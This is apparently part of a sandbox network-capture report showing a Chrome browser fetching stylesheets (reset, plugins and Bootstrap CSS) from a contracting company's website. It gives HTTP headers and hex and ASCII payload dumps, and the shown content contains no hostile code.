                                              2024-09-27 06:19:41 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:19:41 UTC8192INData Raw: 32 30 30 30 0d 0a 39 45 52 67 47 41 69 42 2b 78 72 67 4d 34 6c 62 62 33 74 72 73 65 2f 70 2b 46 4c 58 78 4c 67 77 75 42 68 54 79 56 66 54 59 77 4a 33 51 44 52 55 6f 70 41 42 44 78 49 37 5a 31 41 50 38 46 64 67 62 4f 61 2b 66 37 58 43 38 41 66 42 4f 59 45 62 72 78 5a 64 67 49 4f 4e 68 54 32 57 38 44 64 34 52 75 6f 45 68 7a 48 55 4e 58 51 43 53 6a 51 6f 38 41 66 41 65 38 6a 77 30 39 33 77 48 38 75 38 79 66 63 7a 30 43 6b 49 62 68 2f 36 37 41 31 66 67 37 75 76 6c 73 6f 43 46 30 49 30 57 61 55 77 41 67 34 73 64 59 4c 4e 76 62 67 67 37 4c 2f 41 46 59 47 50 6a 52 55 35 31 37 41 38 73 36 4c 6a 4d 4e 41 63 41 35 77 42 42 50 5a 62 2b 42 44 76 32 52 53 47 6b 4b 51 4d 53 66 70 78 32 58 31 77 76 34 70 63 66 36 72 6f 6e 37 70 2b 44 59 74 77 44 75 43 42 7a 76 73 66 77
                                              Data Ascii: 20009ERgGAiB+xrgM4lbb3trse/p+FLXxLgwuBhTyVfTYwJ3QDRUopABDxI7Z1AP8FdgbOa+f7XC8AfBOYEbrxZdgIONhT2W8Dd4RuoEhzHUNXQCSjQo8AfAe8jw093wH8u8yfcz0CkIbh/67A1fg7uvlsoCF0I0WaUwAg4sdYLNvbgg7L/AFYGPjRU517A8s6LjMNAcA5wBBPZb+BDv2RSGkKQMSfpx2X1wv4pcf6ron7p+DYtwDuCBzvsfw
                                              2024-09-27 06:19:41 UTC6INData Raw: 48 4a 6d 37 43 76
                                              Data Ascii: HJm7Cv
                                              2024-09-27 06:19:41 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:19:41 UTC8192INData Raw: 32 30 30 30 0d 0a 59 6b 74 6a 64 2b 35 34 71 7a 61 44 49 57 42 4a 78 50 5a 56 73 4a 4f 77 49 6a 69 58 2f 36 71 6a 58 50 59 35 6b 34 4b 33 6b 50 39 4d 4b 47 2b 59 38 6b 6a 6b 51 30 61 54 49 4a 57 34 74 79 44 65 6c 5a 4c 2b 44 54 30 56 67 41 57 6d 34 57 7a 50 48 59 56 4e 56 39 6f 53 75 65 6c 4c 77 46 41 47 41 66 4b 69 64 68 54 78 62 6c 37 67 32 65 67 63 33 48 66 34 37 74 70 53 36 2b 50 69 2f 35 6d 6f 62 6b 48 70 58 71 67 33 58 34 42 32 46 44 59 6c 4b 62 38 63 41 78 32 48 61 2f 63 69 32 4d 4a 58 56 4b 32 31 50 77 4e 39 68 68 4b 6c 39 55 38 44 4f 37 59 57 6d 71 38 35 43 33 77 37 66 2f 59 4b 4d 43 74 32 4b 5a 43 76 4e 71 55 2b 41 4d 59 41 4e 61 44 77 51 61 73 50 55 70 70 2b 49 76 31 30 65 55 38 68 67 41 46 41 33 43 39 72 49 75 56 50 4a 71 59 4f 36 4f 76 66 6a
                                              Data Ascii: 2000Yktjd+54qzaDIWBJxPZVsJOwIjiX/6qjXPY5k4K3kP9MKG+Y8kjkQ0aTIJW4tyDelZL+DT0VgAWm4WzPHYVNV9oSuelLwFAGAfKidhTxbl7g2egc3Hf47tpS6+Pi/5mobkHpXqg3X4B2FDYlKb8cAx2Ha/ci2MJXVK21PwN9hhKl9U8DO7YWmq85C3w7f/YKMCt2KZCvNqU+AMYANaDwQasPUpp+Iv10eU8hgAFA3C9rIuVPJqYO6Ovfj


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.465315173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:42 UTC633OUTGET /css/reset.css HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:42 UTC258INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:42 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:21:00 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 1823
                                              Connection: close
                                              Content-Type: text/css
                                              2024-09-27 06:19:42 UTC1823INData Raw: 2f 2a 2d 2d 0a 09 72 65 73 65 74 0a 2d 2d 2a 2f 20 0a 68 74 6d 6c 2c 62 6f 64 79 2c 64 69 76 2c 73 70 61 6e 2c 61 70 70 6c 65 74 2c 6f 62 6a 65 63 74 2c 69 66 72 61 6d 65 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 70 72 65 2c 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 62 69 67 2c 63 69 74 65 2c 63 6f 64 65 2c 64 65 6c 2c 64 66 6e 2c 65 6d 2c 66 6f 6e 74 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 74 74 2c 76 61 72 2c 64 6c 2c 64 74 2c 64 64 2c 6f 6c 2c 75 6c 2c 6c 69 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 74 61 62 6c 65 2c 63 61
                                              Data Ascii: /*--reset--*/ html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,ca


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.465314173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:42 UTC635OUTGET /css/plugins.css HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:42 UTC259INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:42 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 16 Jan 2023 08:19:57 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 36899
                                              Connection: close
                                              Content-Type: text/css
                                              2024-09-27 06:19:42 UTC7933INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 0a 2f 2a 20 43 53 53 20 44 6f 63 75 6d 65 6e 74 20 2a 2f 0a 0a 0a 0a 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 76 69 64 65 6f 20 7b 20 0a 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 6f 70 3a 20 30 3b 0a 7d 0a 76 69 64 65 6f 2c 0a 73 6f 75 72 63 65 20 7b 0a 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 7d 0a 2e
                                              Data Ascii: @charset "utf-8";/* CSS Document */.background-video { bottom: 0; left: 0; overflow: hidden; position: absolute; right: 0; top: 0;}video,source { bottom: 0; left: 0; min-height: 100%; min-width: 100%; position: absolute;}.
                                              2024-09-27 06:19:42 UTC8000INData Raw: 67 2d 6f 75 74 65 72 2e 6c 67 2d 70 75 6c 6c 2d 63 61 70 74 69 6f 6e 2d 75 70 20 2e 6c 67 2d 73 75 62 2d 68 74 6d 6c 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 62 6f 74 74 6f 6d 20 30 2e 32 35 73 20 65 61 73 65 3b 0a 20 20 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 62 6f 74 74 6f 6d 20 30 2e 32 35 73 20 65 61 73 65 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 62 6f 74 74 6f 6d 20 30 2e 32 35 73 20 65 61 73 65 3b 0a 7d 0a 2e 6c 67 2d 6f 75 74 65 72 2e 6c 67 2d 70 75 6c 6c 2d 63 61 70 74 69 6f 6e 2d 75 70 2e 6c 67 2d 74 68 75 6d 62 2d 6f 70 65 6e 20 2e 6c 67 2d 73 75 62 2d 68 74 6d 6c 20 7b 0a 20 20 62 6f 74 74 6f 6d 3a 20 31 30 30 70 78 3b 0a 7d 0a 2e 6c 67 2d 6f 75 74 65 72 20 2e 6c 67 2d 74 6f 6f 67 6c 65 2d 74 68 75
                                              Data Ascii: g-outer.lg-pull-caption-up .lg-sub-html { -webkit-transition: bottom 0.25s ease; -o-transition: bottom 0.25s ease; transition: bottom 0.25s ease;}.lg-outer.lg-pull-caption-up.lg-thumb-open .lg-sub-html { bottom: 100px;}.lg-outer .lg-toogle-thu
                                              2024-09-27 06:19:42 UTC8000INData Raw: 72 2d 62 6f 78 3b 0a 7d 0a 2e 6c 67 2d 6f 75 74 65 72 2e 6c 67 2d 76 69 73 69 62 6c 65 20 7b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 7d 0a 2e 6c 67 2d 6f 75 74 65 72 2e 6c 67 2d 63 73 73 33 20 2e 6c 67 2d 69 74 65 6d 2e 6c 67 2d 70 72 65 76 2d 73 6c 69 64 65 2c 20 2e 6c 67 2d 6f 75 74 65 72 2e 6c 67 2d 63 73 73 33 20 2e 6c 67 2d 69 74 65 6d 2e 6c 67 2d 6e 65 78 74 2d 73 6c 69 64 65 2c 20 2e 6c 67 2d 6f 75 74 65 72 2e 6c 67 2d 63 73 73 33 20 2e 6c 67 2d 69 74 65 6d 2e 6c 67 2d 63 75 72 72 65 6e 74 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 69 6e 68 65 72 69 74 20 21
                                              Data Ascii: r-box;}.lg-outer.lg-visible { opacity: 1;}.lg-outer.lg-css3 .lg-item.lg-prev-slide, .lg-outer.lg-css3 .lg-item.lg-next-slide, .lg-outer.lg-css3 .lg-item.lg-current { -webkit-transition-duration: inherit !important; transition-duration: inherit !
                                              2024-09-27 06:19:42 UTC8000INData Raw: 70 65 72 74 79 3a 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 74 72 61 6e 73 66 6f 72 6d 2c 68 65 69 67 68 74 7d 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 77 69 70 65 72 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 6f 70 61 63 69 74 79 3a 30 3b 7a 2d 69 6e 64 65 78 3a 2d 31 30 30 30 7d 2e 73 77 69 70 65 72 2d 77 70 38 2d 68 6f 72 69 7a 6f 6e 74 61 6c 7b 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 70 61 6e 2d 79 3b 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 70 61 6e 2d 79 7d 2e 73 77 69 70 65 72 2d 77 70 38 2d 76 65 72 74 69 63 61
                                              Data Ascii: perty:-ms-transform;transition-property:transform,height}.swiper-container .swiper-notification{position:absolute;left:0;top:0;pointer-events:none;opacity:0;z-index:-1000}.swiper-wp8-horizontal{-ms-touch-action:pan-y;touch-action:pan-y}.swiper-wp8-vertica
                                              2024-09-27 06:19:42 UTC4966INData Raw: 69 74 79 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 6f 70 61 63 69 74 79 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 6f 70 61 63 69 74 79 7d 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 61 64 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 61 64 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 61 63 74 69 76 65 2c 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 61 64 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 61 63 74 69 76 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 61 63 74 69 76 65 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e
                                              Data Ascii: ity;-o-transition-property:opacity;transition-property:opacity}.swiper-container-fade .swiper-slide .swiper-slide{pointer-events:none}.swiper-container-fade .swiper-slide-active,.swiper-container-fade .swiper-slide-active .swiper-slide-active{pointer-even


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.465313173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:42 UTC641OUTGET /css/bootstrap.min.css HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:42 UTC260INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:42 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:20:54 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 379988
                                              Connection: close
                                              Content-Type: text/css
                                              2024-09-27 06:19:42 UTC7932INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d
                                              Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.1.3 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors * Copyright 2011-2021 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6efd;-
                                              2024-09-27 06:19:42 UTC8000INData Raw: 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 0a 7d 0a 0a 6c 65 67 65 6e 64 20 7b 0a 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 63 61 6c 63 28 31 2e 32 37 35 72 65 6d 20 2b 20 2e 33 76 77 29 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 0a 7d 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 20 7b 0a 20 20 20 20 6c 65 67 65 6e 64 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 0a 20 20 20
                                              Data Ascii: ; margin: 0; border: 0}legend { float: left; width: 100%; padding: 0; margin-bottom: .5rem; font-size: calc(1.275rem + .3vw); line-height: inherit}@media (min-width: 1200px) { legend { font-size:1.5rem
                                              2024-09-27 06:19:42 UTC8000INData Raw: 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 38 33 2e 33 33 33 33 33 33 33 33 25 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 31 31 20 7b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 31 2e 36 36 36 36 36 36 36 37 25 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 31 32 20 7b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6f 66 66 73 65 74 2d 73 6d 2d 30 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                                              Data Ascii: flex: 0 0 auto; width: 83.33333333% } .col-sm-11 { flex: 0 0 auto; width: 91.66666667% } .col-sm-12 { flex: 0 0 auto; width: 100% } .offset-sm-0 { margin-left: 0 }
                                              2024-09-27 06:19:42 UTC8000INData Raw: 2a 20 7b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6c 2d 78 6c 2d 61 75 74 6f 20 7b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6c 2d 78 6c 2d 31 20 7b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 38 2e 33 33 33 33 33 33 33 33 25 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6c 2d 78 6c 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20
                                              Data Ascii: * { flex: 0 0 auto; width: 16.6666666667% } .col-xl-auto { flex: 0 0 auto; width: auto } .col-xl-1 { flex: 0 0 auto; width: 8.33333333% } .col-xl-2 { flex: 0 0 auto;
                                              2024-09-27 06:19:42 UTC8000INData Raw: 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 2d 2d 62 73 2d 74 61 62 6c 65 2d 68 6f 76 65 72 2d 62 67 3a 20 23 62 66 65 32 65 39 3b 0a 20 20 20 20 2d 2d 62 73 2d 74 61 62 6c 65 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 62 61 64 63 65 33 0a 7d 0a 0a 2e 74 61 62 6c 65 2d 77 61 72 6e 69 6e 67 20 7b 0a 20 20 20 20 2d 2d 62 73 2d 74 61 62 6c 65 2d 62 67 3a 20 23 66 66 66 33 63 64 3b 0a 20 20 20 20 2d 2d 62 73 2d 74 61 62 6c 65 2d 73 74 72 69 70 65 64 2d 62 67 3a 20 23 66 32 65 37 63 33 3b 0a 20 20 20 20 2d 2d 62 73 2d 74 61 62 6c 65 2d 73 74 72 69 70 65 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 2d 2d 62 73 2d 74 61 62 6c
                                              Data Ascii: lor: #000; --bs-table-hover-bg: #bfe2e9; --bs-table-hover-color: #000; color: #000; border-color: #badce3}.table-warning { --bs-table-bg: #fff3cd; --bs-table-striped-bg: #f2e7c3; --bs-table-striped-color: #000; --bs-tabl
                                              2024-09-27 06:19:42 UTC8000INData Raw: 7b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 2e 35 65 6d 20 2b 20 31 72 65 6d 20 2b 20 32 70 78 29 0a 7d 0a 0a 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 63 6f 6c 6f 72 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 72 65 6d 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 2e 33 37 35 72 65 6d 0a 7d 0a 0a 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 63 6f 6c 6f 72 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 5b 72 65 61 64 6f 6e 6c 79 5d 29 20 7b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 0a 7d 0a 0a 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 63 6f 6c 6f 72 3a 3a 2d 6d 6f 7a 2d 63 6f 6c 6f 72 2d 73 77 61 74 63 68 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a
                                              Data Ascii: { min-height: calc(1.5em + 1rem + 2px)}.form-control-color { width: 3rem; height: auto; padding: .375rem}.form-control-color:not(:disabled):not([readonly]) { cursor: pointer}.form-control-color::-moz-color-swatch { height:
                                              2024-09-27 06:19:42 UTC8000INData Raw: 6d 2d 6f 72 69 67 69 6e 3a 20 30 20 30 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 74 72 61 6e 73 66 6f 72 6d 20 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 0a 7d 0a 0a 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 72 65 64 75 63 65 29 20 7b 0a 20 20 20 20 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 6c 61 62 65 6c 20 7b 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6e 6f 6e 65 0a 20 20 20 20 7d 0a 7d 0a 0a 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 72 65 6d 20 2e 37 35 72 65 6d 0a 7d 0a 0a 2e 66 6f 72 6d 2d 66 6c 6f 61
                                              Data Ascii: m-origin: 0 0; transition: opacity .1s ease-in-out,transform .1s ease-in-out}@media (prefers-reduced-motion:reduce) { .form-floating>label { transition: none }}.form-floating>.form-control { padding: 1rem .75rem}.form-floa
                                              2024-09-27 06:19:42 UTC8000INData Raw: 2e 33 37 35 72 65 6d 29 0a 7d 0a 0a 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 69 6e 76 61 6c 69 64 3a 66 6f 63 75 73 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 69 6e 76 61 6c 69 64 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 64 63 33 35 34 35 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 2e 32 35 72 65 6d 20 72 67 62 61 28 32 32 30 2c 35 33 2c 36 39 2c 2e 32 35 29 0a 7d 0a 0a 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 69 6e 76 61 6c 69 64 2c 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 69 6e 76 61 6c 69 64 20 7b 0a 20 20 20 20 70 61 64 64
                                              Data Ascii: .375rem)}.form-control.is-invalid:focus,.was-validated .form-control:invalid:focus { border-color: #dc3545; box-shadow: 0 0 0 .25rem rgba(220,53,69,.25)}.was-validated textarea.form-control:invalid,textarea.form-control.is-invalid { padd
